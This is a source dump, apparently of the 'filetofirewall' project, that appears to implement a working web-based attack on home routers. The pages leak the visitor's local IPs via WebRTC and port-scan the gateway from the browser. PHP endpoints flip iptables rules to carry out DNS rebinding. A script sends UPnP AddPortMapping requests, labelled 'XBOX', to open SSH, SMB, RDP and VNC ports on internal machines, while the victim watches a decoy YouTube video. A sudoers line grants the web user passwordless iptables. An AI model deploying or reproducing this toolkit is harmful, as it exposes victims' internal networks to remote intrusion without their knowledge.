359 |         return $res;
360 |     }
361 | 
362 |     private function ds_encode_type($type, $val = NULL, $offset = NULL)
363 |     {
364 |         switch ($type) {
365 |             case $this->DS_TYPE_A:
366 |                 $enc = inet_pton($val);
367 |                 if (strlen($enc) != 4)
368 |                     $enc = "\0\0\0\0";
369 |                 return $enc;
370 |             case $this->DS_TYPE_AAAA:
371 |                 $enc = inet_pton($val);
372 |                 if (strlen($enc) != 16)
373 |                     $enc = str_repeat("\0", 16);
374 |                 return $enc;
375 |             case $this->DS_TYPE_NS:
376 |                 return $this->ds_encode_label($val, $offset);
377 |             case $this->DS_TYPE_CNAME:
378 |                 return $this->ds_encode_label($val, $offset);
379 |             case $this->DS_TYPE_SOA:
380 |                 $res = '';
381 |                 $res .= $this->ds_encode_label($val['mname'], $offset);
382 |                 $res .= $this->ds_encode_label($val['rname'], $offset + strlen($res));
383 |                 $res .= pack('NNNNN', $val['serial'], $val['refresh'], $val['retry'], $val['expire'], $val['minimum']);
384 |                 return $res;
385 |             case $this->DS_TYPE_PTR:
386 |                 return $this->ds_encode_label($val, $offset);
387 |             case $this->DS_TYPE_MX:
388 |                 return pack('n', 10) . $this->ds_encode_label($val, $offset + 2);
389 |             case $this->DS_TYPE_TXT:
390 |                 if (strlen($val) > 255)
391 |                     $val = substr($val, 0, 255);
392 | 
393 |                 return chr(strlen($val)) . $val;
394 |             case $this->DS_TYPE_AXFR:
395 |                 return '';
396 |             case $this->DS_TYPE_ANY:
397 |                 return '';
398 |             case $this->DS_TYPE_OPT:
399 |                 $res = [
400 |                     'class' => $val['udp_payload_size'],
401 |                     'ttl' => (($val['ext_code'] & 0xff) << 24) | (($val['version'] & 0xff) << 16) | ($this->ds_encode_flags($val['flags']) & 0xffff),
402 |                     'data' => '', // TODO: encode data
403 |                 ];
404 | 
405 |                 return $res;
406 |             default:
407 |                 return $val;
408 |         }
409 |     }
410 | 
411 |     public function ds_error($code, $error, $file, $line)
412 |     {
413 |         if (!(error_reporting() & $code)) {
414 |             return;
415 |         }
416 | 
417 |         $codes = [
418 |             E_ERROR => 'Error',
419 |             E_WARNING => 'Warning',
420 |             E_PARSE => 'Parse Error',
421 |             E_NOTICE => 'Notice',
422 |             E_CORE_ERROR => 'Core Error',
423 |             E_CORE_WARNING => 'Core Warning',
424 |             E_COMPILE_ERROR => 'Compile Error',
425 |             E_COMPILE_WARNING => 'Compile Warning',
426 |             E_USER_ERROR => 'User Error',
427 |             E_USER_WARNING => 'User Warning',
428 |             E_USER_NOTICE => 'User Notice',
429 |             E_STRICT => 'Strict Notice',
430 |             E_RECOVERABLE_ERROR => 'Recoverable Error',
431 |             E_DEPRECATED => 'Deprecated Error',
432 |             E_USER_DEPRECATED => 'User Deprecated Error'
433 |         ];
434 | 
435 |         $type = isset($codes[$code]) ? $codes[$code] : 'Unknown Error';
436 | 
437 |         die(sprintf('DNS Server error: [%s] "%s" in file "%s" on line "%d".%s', $type, $error, $file, $line, PHP_EOL));
438 |     }
439 | 
440 |     public static function get_ds_types()
441 |     {
442 |         return $this->$DS_TYPES;
443 |     }
444 | 
445 | }
446 | 
447 | ?>


--------------------------------------------------------------------------------
/etc/phpdns/example.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | // REGISTER AUTOLOADER
 3 | spl_autoload_register(function ($class) {
 4 |     $file = __DIR__ . DIRECTORY_SEPARATOR . str_replace('\\', '/', $class) . '.php';
 5 | 
 6 |     if (file_exists($file)) {
 7 |         require $file;
 8 |     }
 9 | });
10 | 
11 | use StorageProvider\JsonStorageProvider;
12 | 
13 | require "dns_server.class.php";
14 | 
15 | $record_file = 'dns_record.json';
16 | $storage = new JsonStorageProvider($record_file);
17 | 
18 | // Creating a new instance of our class
19 | $dns = new PHP_DNS_SERVER($storage);
20 | 
21 | // Connection constants
22 | define('MEMCACHED_HOST', '127.0.0.1');
23 | define('MEMCACHED_PORT', '11211');
24 | 
25 | // Connection creation
26 | global $cacheAvailable;
27 | global $memcache;
28 | $memcache = new Memcache;
29 | $cacheAvailable = $memcache->connect(MEMCACHED_HOST, MEMCACHED_PORT);
30 | 
31 | // Starting our DNS server
32 | $dns->start();
33 | ?>
34 | 


--------------------------------------------------------------------------------
/infoflow_new.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/filetofirewall/fof/5a8e4ea380d6e930db62e1fb2e82c4349dcd897a/infoflow_new.jpg


--------------------------------------------------------------------------------
/php_inline.conf:
--------------------------------------------------------------------------------
1 | AddType application/x-httpd-php .html .htm .js
2 | 


--------------------------------------------------------------------------------
/phpdns_ubuntu_service:
--------------------------------------------------------------------------------
1 | sudo screen -dmS phpdns su -c 'echo "Waiting for system start"; sleep 10s; cd /etc/phpdns; php example.php'
2 | 


--------------------------------------------------------------------------------
/server_settings.readme:
--------------------------------------------------------------------------------
1 | #Add to the bottom of the /etc/sudoers file
2 | www-data ALL=NOPASSWD: /sbin/iptables
3 | 


--------------------------------------------------------------------------------
/var/www/html/ajax-loader.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/filetofirewall/fof/5a8e4ea380d6e930db62e1fb2e82c4349dcd897a/var/www/html/ajax-loader.gif


--------------------------------------------------------------------------------
/var/www/html/c0.html:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     $domain = explode(".",$_SERVER["HTTP_HOST"]);
 3 | 
 4 |     if ($domain[0] == "d0") {
 5 |         $port = base64_decode(file_get_contents("php://input"));
 6 | 
 7 |         if (!(ctype_digit($port))) {
 8 |             $port = "80";
 9 |         }
10 | 
11 |         gethostbyname("c0.".$domain[1].".".$domain[2].".".$domain[3]);
12 |         //USE THIS IF SERVER HAS PUB IP $blockip = gethostbyname($domain[1].".".$domain[2].".".$domain[3]);
13 |         $blockip = "10.200.120.20";
14 |         //echo "c0.".$domain[1].".".$domain[2].".".$domain[3];
15 |         echo $blockip;
16 | 
17 |         if (substr($domain[1], 0, 1) == "f") {
18 |             exec('sudo iptables -D INPUT -p tcp -s '.$_SERVER["REMOTE_ADDR"].' -d '.$blockip.' --dport '.$port.' -j REJECT --reject-with tcp-reset');
19 |             //OLDexec('sleep 10; sudo iptables -A INPUT -p tcp -s '.$_SERVER["REMOTE_ADDR"].' -d 192.168.141.144 -j REJECT --reject-with tcp-reset');
20 |         }
21 |     }
22 | ?>
23 | 
24 | SUCCESS
25 | 


--------------------------------------------------------------------------------
/var/www/html/c1.html:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     session_start();
 3 |     $domain = explode(".",$_SERVER["HTTP_HOST"]);
 4 | 
 5 |     if ($domain[0] == "d1") {
 6 |         $port = base64_decode(file_get_contents("php://input"));
 7 | 
 8 |         if (!(ctype_digit($port))) {
 9 |             $port = "80";
10 |         }
11 | 
12 |         echo $_SERVER["SERVER_PORT"];
13 |         //USE THIS IF SERVER HAS PUB IP $blockip = gethostbyname($domain[1].".".$domain[2].".".$domain[3]);
14 |         $blockip = "10.200.120.20";
15 |         //gethostbyname("c1.".$domain[1].".".$domain[2].".".$domain[3]);
16 |         echo $blockip;
17 |         //echo "c1.".$domain[1].".".$domain[2].".".$domain[3];
18 |         //exec('sleep 10; sudo iptables -I INPUT -p tcp --sport '.$_SERVER["REMOTE_PORT"].' -s '.$_SERVER["REMOTE_HOST"].' -j DROP --comment '.$_SESSION["uid"]);
19 | 
20 |         if (substr($domain[1], 0, 1) == "f") {
21 |             exec('sudo iptables -A INPUT -p tcp -s '.$_SERVER["REMOTE_ADDR"].' -d '.$blockip.' --dport '.$port.' -j REJECT --reject-with tcp-reset');
22 |         }
23 | 
24 |         //exec('sleep 20; sudo iptables -D INPUT -p tcp -s '.$_SERVER["REMOTE_ADDR"].' -d i'.$blockip.' --dport 80 -j REJECT --reject-with tcp-reset');
25 |     }
26 | ?>
27 | 
28 | SUCCESS
29 | 


--------------------------------------------------------------------------------
/var/www/html/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     //This is the main settings configuration file.  Please note that these variables are written in Javascript syntax and are imported into the Javascript delivered to the client.  Do not put ending semi-colons for javascript.  Those are added later
 3 |     $ports = '[1780,1900,2189,2600,2869,2555,5555,37215,47128,49000,49152,49153,56688]';
 4 |     $portfinalresort = '[80]';
 5 | 
 6 |     $opnports = '["22:TCP", "161:UDP", "80:TCP", "443:TCP", "445:TCP", "3389:TCP", "5900:TCP", "5901:TCP", location.port + ":TCP"]';
 7 |     $opnports1 = '["22:TCP", "161:UDP", "80:TCP", "443:TCP", "445:TCP", "8080:TCP", "3389:TCP", "3306:TCP", "1433:TCP", "79:TCP", "3283:TCP", "3283:UDP", "5900:TCP", "5901:TCP", "5988:TCP", location.port + ":TCP"]';
 8 | 
 9 |     $startportnum = '5800';
10 | ?>
11 | 


--------------------------------------------------------------------------------
/var/www/html/i0.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     // Connection constants
 3 |     define('MEMCACHED_HOST', '127.0.0.1');
 4 |     define('MEMCACHED_PORT', '11211');
 5 | 
 6 |     // Connection creation
 7 |     $memcache = new Memcache;
 8 |     $cacheAvailable = $memcache->connect(MEMCACHED_HOST, MEMCACHED_PORT);
 9 | 
10 |     $cdns = explode(".", $_SERVER["HTTP_HOST"]);
11 |     $cdns_ct = count($cdns);
12 | 
13 |     /*$key = "test";
14 |     $product = array("123", "456");
15 | 
16 |     $memcache->set($key, $product);
17 | 
18 |     $text = $memcache->get($key);
19 | 
20 |     foreach ($text as $data) {
21 |         echo $data;
22 |     }*/
23 | 
24 |     $iparray = "";
25 |     $key = $cdns[$cdns_ct-3];
26 |     //Remove initial colon from ip array
27 |     $iparray = $memcache->get($key."ip");
28 |     echo $iparray;
29 | ?>
30 | 


--------------------------------------------------------------------------------
/var/www/html/open.js:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     include 'config.php';
 3 |     echo 'var opnports = ' . $opnports . ";\n";
 4 | ?>
 5 | 
 6 | var logs = "";
 7 | 
 8 | function opnip(iparray, corrurl, schematype, startportnum) {
 9 |     postMessage(['Beginning openip at startportnum: ' + startportnum, logs]);
10 | 
11 |     if (typeof iparray === 'undefined') {
12 |         iparray = intips;
13 |     }
14 | 
15 |     for (i=0; i < iparray.length; i++) {
16 |         for (j=0; j < opnports.length; j++) {
17 |             var portarr = opnports[j].split(":");
18 |             var proto = portarr[1];
19 |             var intportnum = portarr[0];
20 |             logs = logs + startportnum + "---" + iparray[i] + ":" + intportnum + "_" + proto + '<br>';
21 |             //console.log('Starting open with Control URL : ' + corrurl );
22 |             loadXMLDoc(corrurl, schematype, startportnum, intportnum, proto, iparray[i]);
23 |             startportnum++;
24 |         }
25 |     }
26 | }
27 | 
28 | function processReqChange() {
29 |     // only if req shows "loaded"
30 |     if (req.readyState == 4) {
31 |         // only if "OK"
32 |         if (req.status == 200) {
33 |             // ...processing statements go here...
34 |             // alert(req.responseText);
35 |         } else {
36 |             logs = logs + "There was a problem retrieving the XML data:\n" + req.statusText + '<br>';
37 |         }
38 |     }
39 | }
40 | 
41 | function loadXMLDoc(url, schema, extport, intport, proto, intip) {
42 |     //document.write("startxml");
43 |     req = false;
44 |     // branch for native XMLHttpRequest object
45 |     req = new XMLHttpRequest();
46 | 
47 |     if(req) {
48 |         //document.write("postxml");
49 |         req.onreadystatechange = processReqChange;
50 |         req.open("POST", url, true);
51 |         req.setRequestHeader('SOAPAction', '"' + schema + '#AddPortMapping"');
52 | 
53 |         req.send('<?php echo '<?'?>xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">'+ extport + '</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">' + proto + '</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">' + intport + '</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">' + intip + '</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">XBOX</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>');
54 |     }
55 | }
56 | 
57 | onmessage = function(e) {
58 |     postMessage(['Beginning worker', logs]);
59 |     console.log('Message received from main script with URL: ' + e.data[1] );
60 |     //console.log('edata[0]: ' + e.data[0] );
61 |     //console.log('edata[1]: ' + e.data[1] );
62 |     //console.log('edata[2]: ' + e.data[2] );
63 |     //Here we invoke open function using data passed from main
64 |     opnip(e.data[0], e.data[1], e.data[2], e.data[3]);
65 |     console.log('Posting message back to main script');
66 |     postMessage(['Logs', logs]);
67 | }
68 | 


--------------------------------------------------------------------------------
/var/www/html/p0.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |     <body>
 3 |         <?php
 4 |             $files = glob('testup/*.{html}', GLOB_BRACE);
 5 | 
 6 |             foreach($files as $file) {
 7 |                 echo '<iframe src="'.$file.'"></iframe>';
 8 |             }
 9 |         ?>
10 |     </body>
11 | <html>
12 | 


--------------------------------------------------------------------------------
/var/www/html/r0.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     $cdns = explode(".", $_SERVER["HTTP_HOST"]);
 3 |     $cdns_ct = count($cdns);
 4 | 
 5 |     if ($cdns_ct > 2) {
 6 |         file_put_contents("/var/www/html/testup/".$_SERVER["HTTP_HOST"]."out.html", $_SERVER["REMOTE_ADDR"].'<br>'.file_get_contents("php://input"));
 7 |     } else {
 8 |         file_put_contents("/var/www/html/testup/".$_SERVER["REMOTE_ADDR"]."out.html", $_SERVER["REMOTE_ADDR"].'<br>'.file_get_contents("php://input"));
 9 |     }
10 | ?>
11 | 


--------------------------------------------------------------------------------
/var/www/html/test.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 |     function pausecomp(millis) {
 3 |       var date = new Date();
 4 |       var curDate = null;
 5 |       do { curDate = new Date(); }
 6 |       while(curDate-date < millis);
 7 |     }
 8 | 
 9 |     function httpGet(theUrl) {
10 |         var xmlHttp = null;
11 | 
12 |         xmlHttp = new XMLHttpRequest();
13 |         xmlHttp.open( "GET", theUrl, false );
14 |         xmlHttp.send( null );
15 |         return xmlHttp.responseText;
16 |     }
17 | 
18 |     function httpPost(theUrl,theText) {
19 |         var xmlHttp = null;
20 | 
21 |         xmlHttp = new XMLHttpRequest();
22 |         xmlHttp.open( "POST", theUrl, false );
23 |         xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
24 |         xmlHttp.send(theText);
25 |         return xmlHttp.responseText;
26 |     }
27 | 
28 |     pausecomp(5000);
29 |     var text = httpGet("http://www.test.com");
30 |     pausecomp(5000);
31 |     var postint = httpPost("http://www.test.com",text);
32 | </script>
33 | 
34 | <html>
35 | Hello
36 | </html>
37 | 


--------------------------------------------------------------------------------
/var/www/html/u0.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     // Connection constants
 3 |     define('MEMCACHED_HOST', '127.0.0.1');
 4 |     define('MEMCACHED_PORT', '11211');
 5 | 
 6 |     // Connection creation
 7 |     $memcache = new Memcache;
 8 |     $cacheAvailable = $memcache->connect(MEMCACHED_HOST, MEMCACHED_PORT);
 9 | 
10 |     $cdns = explode(".", $_SERVER["HTTP_HOST"]);
11 |     $cdns_ct = count($cdns);
12 |     $connip = $_SERVER["REMOTE_ADDR"];
13 |     //HERE WE SET WHETHER TO USE PUB IP FOR REBIND OR PRIVATE GW IP
14 |     $weakendsystem = "off";
15 | 
16 |     /*$key = "test";
17 |     $product = array("123", "456");
18 | 
19 |     $memcache->set($key, $product);
20 | 
21 |     $text = $memcache->get($key);
22 | 
23 |     foreach ($text as $data) {
24 |         echo $data;
25 |     }*/
26 | 
27 |     $iparray = "";
28 |     //Remove initial colon from ip array
29 |     $ipstr = substr(base64_decode(file_get_contents("php://input")),1);
30 | 
31 |     if ($ipstr != false) {
32 |         $iparray = explode(":", $ipstr);
33 |         $key = $cdns[$cdns_ct-3];
34 |         $gip = array(); //Gateway IP Array
35 | 
36 |         foreach ($iparray as $data) {
37 |             $newiparray = explode(";", $data);
38 | 
39 |             if (filter_var($newiparray[0], FILTER_VALIDATE_IP) && filter_var($newiparray[1], FILTER_VALIDATE_IP)) {
40 | 
41 |                 //We are using last IP returned (usually primary in webrtc)
42 |                 $cip = explode(".", $newiparray[0]);
43 |                 $sub = $cip[0].".".$cip[1].".".$cip[2];
44 |                 $gip[$gip.length] = $newiparray[1];
45 |                 //$gip[$gip.length] = $cip[0].".".$cip[1].".".$cip[2].".254";
46 |                 //$gip[$gip.length] = $cip[0].".".$cip[1].".".$cip[2].".2";
47 |                 //$gip[$gip.length] = $cip[0].".".$cip[1].".".$cip[2].".3";
48 |                 /* This is old code from php determining gateway.  Javascript now posts the correct gateway ip
49 |                 echo $cip[0].".".$cip[1].".".$cip[2].".1\n";
50 |                 */
51 |                 $memcache->set($key."ip", $newiparray[1].";".$newiparray[0].";".$sub);
52 | 
53 |                 if ($weakendsystem == "on") {
54 |                     $memcache->set($key, $connip);
55 |                 } else {
56 |                     $memcache->set($key, $gip);
57 |                 }
58 |             }
59 |         }
60 |     }
61 | ?>
62 | 


--------------------------------------------------------------------------------
/var/www/html/wmain.html:
--------------------------------------------------------------------------------
  1 | <?php
  2 |     //The main.html file is responsible for port scanning the gateway and finding the open UPnP port, then redirecting the browser.
  3 | 
  4 |     $debugmode = "off"; //Set this to "on" to turn on debugging
  5 |     //Here we are getting the current Cookie parameters.
  6 |     //We need to make this cookie valid for all subdomains
  7 |     $currentCookieParams = session_get_cookie_params();
  8 | 
  9 |     //Turn the queried HTTP Host Header into an array to count # of subdomains
 10 |     $cdns = explode(".", $_SERVER["HTTP_HOST"]);
 11 |     $cdns_ct = count($cdns);
 12 | 
 13 |     //If there are more than 2 subdomains, take the last two for the domain value
 14 |     if ($cdns_ct > 2) {
 15 |         $rootDomain = ".".$cdns[$cdns_ct-2].".".$cdns[$cdns_ct-1];
 16 |     } else {
 17 |         $rootDomain = $_SERVER["HTTP_HOST"];
 18 |         //echo $cdns_ct;
 19 |     }
 20 | 
 21 |     session_set_cookie_params(
 22 |         $currentCookieParams["lifetime"],
 23 |         $currentCookieParams["path"],
 24 |         $rootDomain,
 25 |          false,  //$currentCookieParams["secure"],
 26 |         false //$currentCookieParams["httponly"]
 27 |     );
 28 | 
 29 |     //Start the session
 30 |     session_start();
 31 |     $browser = get_browser(null, true);
 32 |     $_SESSION["browser"] =  $browser['browser'];
 33 | 
 34 |     if ($debugmode == "on") {
 35 |         echo $_SESSION["browser"];
 36 |         $_SESSION["debug"] = "on";
 37 |     }
 38 | 
 39 |     //Setup uniqueid subdomain.  Since Chrome and Firefox work, set all browsers to f.  the f prefix will execute Multiple A record attack
 40 |     if ($_SESSION["browser"] )//== "Firefox") {
 41 |         $_SESSION["uid"] = uniqid("f");
 42 |     } else {
 43 |         $_SESSION["uid"] = uniqid("d");
 44 |     }
 45 | 
 46 |     $_SESSION["domain"] = $rootDomain;
 47 |     //echo $rootDomain;
 48 | ?>
 49 | 
 50 | <html>
 51 |     <meta http-equiv="refresh" content="1200; URL=http://<?php echo $_SESSION["uid"]; echo $_SESSION["domain"]?>/wopen.html">
 52 | 
 53 |     <script>
 54 |         <?php
 55 |             //This is where we will set our dynamic variables up
 56 |             include 'config.php';
 57 |             echo 'var uniqdom = "' . $_SESSION["uid"] . $_SESSION["domain"] . '";';
 58 |             echo 'var ports = ' . $ports . ';';
 59 |             echo 'var portfinalresort = ' . $portfinalresort . ';';
 60 |         ?>
 61 | 
 62 |         var postint = "";
 63 |         var portsopen = [];
 64 |         //var gws = [1,254,253,2,3];
 65 | 
 66 |         function pausecomp(millis) {
 67 |           var date = new Date();
 68 |           var curDate = null;
 69 |           do { curDate = new Date(); }
 70 |           while(curDate-date < millis);
 71 |         }
 72 | 
 73 |         function httpGet(theUrl) {
 74 |             var xmlHttp = null;
 75 | 
 76 |             xmlHttp = new XMLHttpRequest();
 77 |             xmlHttp.open( "GET", theUrl, false );
 78 |             xmlHttp.send( null );
 79 |             return xmlHttp.responseText;
 80 |         }
 81 | 
 82 |         function httpPost(theUrl,theText) {
 83 |             var xmlHttp = null;
 84 | 
 85 |             xmlHttp = new XMLHttpRequest();
 86 |             xmlHttp.open( "POST", theUrl, false );
 87 |             xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
 88 |             xmlHttp.send(theText);
 89 |             return xmlHttp.responseText;
 90 |         }
 91 | 
 92 |         window.onerror = handleError;
 93 | 
 94 |         function handleError(message, url, line) {
 95 |             if(message.match(/Script error|Error loading script/)) {
 96 |                 <?php
 97 |                     if (debugmode == "on") {
 98 |                         echo 'document.getElementById("divOutput").innerHTML += "OPEN!";';
 99 |                     }
100 |                 ?>
101 | 
102 |                 var parser = document.createElement('a');
103 |                 parser.href = url;
104 |                 portsopen[portsopen.length] = parser.port;
105 |             }
106 |         }
107 | 
108 |         <?php//Here is the function to gather local IPs add extra OR in grepSDP for candidate string?>
109 |             function enumLocalIPs(cb) {
110 |                 var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
111 |                 if (!RTCPeerConnection) return false;
112 |                 var addrs = Object.create(null);
113 |                 addrs['0.0.0.0'] = false;
114 | 
115 |                 function addAddress(newAddr) {
116 |                     if (newAddr in addrs) return;
117 |                     addrs[newAddr] = true;
118 |                     cb(newAddr);
119 |                 }
120 | 
121 |                 function grepSDP(sdp) {
122 |                     var hosts = [];
123 |                     sdp.split('\r\n').forEach(function (line) {
124 |                         if (~line.indexOf('a=candidate') || ~line.indexOf('candidate:')) {
125 |                             var parts = line.split(' '), addr = parts[4], type = parts[7];
126 |                             if (type === 'host') addAddress(addr);
127 |                         } else if (~line.indexOf('c=')) {
128 |                             var parts = line.split(' '),
129 |                             addr = parts[2];
130 |                             addAddress(addr);
131 |                         }
132 |                     });
133 |                 }
134 | 
135 |                 var rtc = new RTCPeerConnection({iceServers:[]});
136 |                 if (window.mozRTCPeerConnection) rtc.createDataChannel('', {reliable:false});
137 | 
138 |                 rtc.onicecandidate = function (evt) {
139 |                     if (evt.candidate) grepSDP(evt.candidate.candidate);
140 |                 };
141 | 
142 |                 setTimeout(function() {
143 |                     rtc.createOffer(function (offerDesc) {
144 |                         grepSDP(offerDesc.sdp);
145 |                         rtc.setLocalDescription(offerDesc);
146 |                         //}, function (e) {});
147 |                     }, function (e) {}, {mandatory:{OfferToReceiveAudio:true, OfferToReceiveVideo:false}});
148 |                 }, 0);//500);
149 | 
150 |                 return true;
151 |             }
152 | 
153 |         <?php//Here is where we start the show.  We are getting the local IP and posting it to the subdomain ip/u0 base64 encoded ?>
154 |             var u0 = "";
155 |             var newip = "";
156 |             var subnet = "";
157 | 
158 |             function go() {
159 |                 enumLocalIPs(function(localIp) {
160 |                 <?php //Get the localIp ?>
161 | 
162 |                 <?php
163 |                     if (debugmode == "on") {
164 |                         echo 'document.getElementById(\'localips\').innerHTML += localIp + \'<br>\';';
165 |                     }
166 |                 ?>
167 | 
168 |                 <?php //Store the localIp ?>
169 |                     u0 = u0 + ":" + localIp;
170 | 
171 |                 <?php //Send the localIp ?>
172 |                     //var postint = httpPost("http://d0.<?php echo $_SESSION["uid"]; echo $_SESSION["domain"]?>/u0.php",btoa(u0));
173 | 
174 |                 <?php //Do the portscan of the returned ip address.  ********NEED TO ADD ARRAY POSSIBILITY********** ?>
175 |                     subnet = localIp.replace(/(\d+\.\d+\.\d+)\.\d+/, '$1.');
176 | 
177 |                     for (index = 0; index < ports.length; index++) {
178 |                         probeIp(subnet + "1", ports[index], 500);
179 |                         probeIp(subnet + "254", ports[index], 500);
180 |                         //probeIp(subnet + "1", portsfinalresort[0], 500);
181 |                         //probeIp(subnet + "254", portsfinalresort[0], 500);
182 |                     }
183 |                 }) || (document.getElementById('localips').innerHTML = 'WebRTC seems not to be supported');
184 |             }
185 | 
186 |            <?php //Send the localIp ?>
187 |             function postPort (ip, port) {
188 |                 <?php //Send the localIp;gateway ?>
189 |                 pdata = u0 + ";" + ip;
190 |                 var postint = httpPost("http://d0." + uniqdom + "/u0.php",btoa(pdata));
191 |                 <?php //Here we go to the new port open.  We use the first open port found with 80 as the last resort ?>
192 |                 window.location.assign("http://" + uniqdom + ":" + port + "/wopen.html");
193 |             }
194 | 
195 |             <?php //Here is the function to probe an IP address for open ports ?>
196 |             function probeIp(ip, port, timeout) {
197 |                 var start = Date.now();
198 |                 var done = false;
199 |                 var img = document.createElement('img');
200 |                 var clean = function() {
201 |                     if (!img) return;
202 |                     document.body.removeChild(img);
203 |                     img = null;
204 |                 };
205 | 
206 |                 var onResult = function(success) {
207 |                     if (done) return;
208 |                     done = true;
209 |                     clean();
210 | 
211 |                     if (Date.now() - start < timeout) {
212 |                         postPort(ip, port);
213 |                     }
214 |                     //cb(ip, port, Date.now() - start < timeout);
215 |                 };
216 | 
217 |                 document.body.appendChild(img);
218 |                 img.style.display = 'none';
219 |                 img.onload = function() { onResult(true); };
220 |                 img.onerror = function() { onResult(false); };
221 |                 img.src = 'http://' + ip + ':' + port ;
222 |             }
223 | 
224 |         go();
225 |     </script>
226 | 
227 |     <body>
228 |         <?php
229 |             if (debugmode == "on") {
230 |                 echo "Hello ";
231 |                 echo $_SESSION["uid"];
232 |                 echo $_SESSION["domain"];
233 |                 echo '<div id="localips"></div>';
234 |                 echo '<div id="divOutput"></div>';
235 |             } else {
236 |                 echo '<img style="margin:0px auto;display:block" src="ajax-loader.gif" align="middle" />';
237 |             }
238 |         ?>
239 |     </body>
240 | </html>
241 | 


--------------------------------------------------------------------------------
/var/www/html/wopen.html:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     //Start the session
 3 |     session_start();
 4 |     $_SESSION["port"] = $_SERVER["SERVER_PORT"];
 5 |     /*<script type="text/javascript" src="http://<?php echo $_SESSION["uid"]; echo $_SESSION["domain"]; echo ':'; echo $_SESSION["port"]?>/script.js"></script>*/
 6 | ?>
 7 | 
 8 | <html>
 9 |     <head>
10 |         <script>
11 |             function addScript(filename) {
12 |                 var scriptBlock=document.createElement('script');
13 |                 scriptBlock.setAttribute("type","text/javascript");
14 |                 scriptBlock.setAttribute("src",filename);
15 |                 document.getElementsByTagName("head")[0].appendChild(scriptBlock);
16 |             }
17 |         </script>
18 |     </head>
19 | 
20 |     <body onload="addScript('worker.js')">
21 |         <?php
22 |             if ($_SESSION["debug"] == "on") {
23 |                 echo '>'; //Complete the body bracket without background color
24 |                 echo "Hello<br>";
25 |                 echo $_SESSION["uid"];
26 |                 echo $_SESSION["domain"].'<br>';
27 |                 //$browser = get_browser(null, true);
28 |                 //echo $_SESSION['browser'];
29 |                 //echo substr($_SESSION["uid"], 0, 1);
30 |                 echo $_SERVER["SERVER_PORT"];
31 |                 //echo $_SESSION["port"];
32 |             } else {
33 |                 echo 'bgcolor="#000000">';
34 |                 echo '<iframe width="860" height="640" src="//www.youtube.com/embed/Pi31OVkArJc?autoplay=1" frameborder="0" allowfullscreen></iframe>';
35 |             }
36 |         ?>
37 | 
38 |         <!--<iframe id="iframe" src = "chrome://net-internals/#dns"></iframe>-->
39 |     </body>
40 | </html>
41 | 


--------------------------------------------------------------------------------
/var/www/html/worker.js:
--------------------------------------------------------------------------------
  1 | <?php
  2 |     //Start the session (Import variables)
  3 |     session_start();
  4 |     //Setup uniqueid subdomain
  5 |     //$_SESSION["uid"] = uniqid();
  6 |     //$_SESSION["domain"] = ".test.com";
  7 | ?>
  8 | 
  9 | <?php //These are the URLs to look for on the UPnP Gateway ?>
 10 | var urls = ["/DeviceDescription.xml", "/rootDesc.xml", "/upnp/rootdevice.xml", "/upnpdev.xml", "/igd.xml", "/InternetGatewayDevice.xml", "/IGDdevicedesc.xml", "/xml/igdIPDesc.xml", "/WFADevice.xml", "/Public_UPNP_gatedesc.xml"];
 11 | 
 12 | <?php //This is the variable to store the correct control URL ?>
 13 | var corrurl = "";
 14 | 
 15 | <?php //This is the variable to store the correct schema ?>
 16 | var schematype = "";
 17 | 
 18 | <?php
 19 |     include 'config.php';
 20 | 
 21 |     //This is the array of ports to open for each host found
 22 |     echo 'var opnports = ' . $opnports . ";\n";
 23 |     echo 'var startportnum = ' . $startportnum . ";\n";
 24 |     echo 'var uniqdom = "' . $_SESSION["uid"].$_SESSION["domain"] . "\";\n";
 25 | ?>
 26 | 
 27 | <?php //This is the array of internal IP addresses ?>
 28 | var getips = httpGet("http://d0." + uniqdom + "/i0.php", false).split(';');
 29 | var intips = [ getips[0], getips[1]];
 30 | var sub = getips[3];
 31 | var logs = "";
 32 | 
 33 | var xmlhttp = new Array();
 34 | 
 35 | 
 36 | var retrycounter = 0;
 37 | var workernum = 30;
 38 | var workers = [];
 39 | var workerjs = "";
 40 | var blob;
 41 | 
 42 | //Async request for worker code
 43 | xmlhttpworker = new XMLHttpRequest();
 44 | xmlhttpworker.onreadystatechange=function() {
 45 |     if (xmlhttpworker.readyState==4 && xmlhttpworker.status==200) {
 46 |         workerjs = xmlhttpworker.responseText;
 47 |         buildblob();
 48 |         buildworkers();
 49 |         closefw();
 50 |     }
 51 | }
 52 | 
 53 | xmlhttpworker.open("GET","http://" + uniqdom + '/open.js',true);
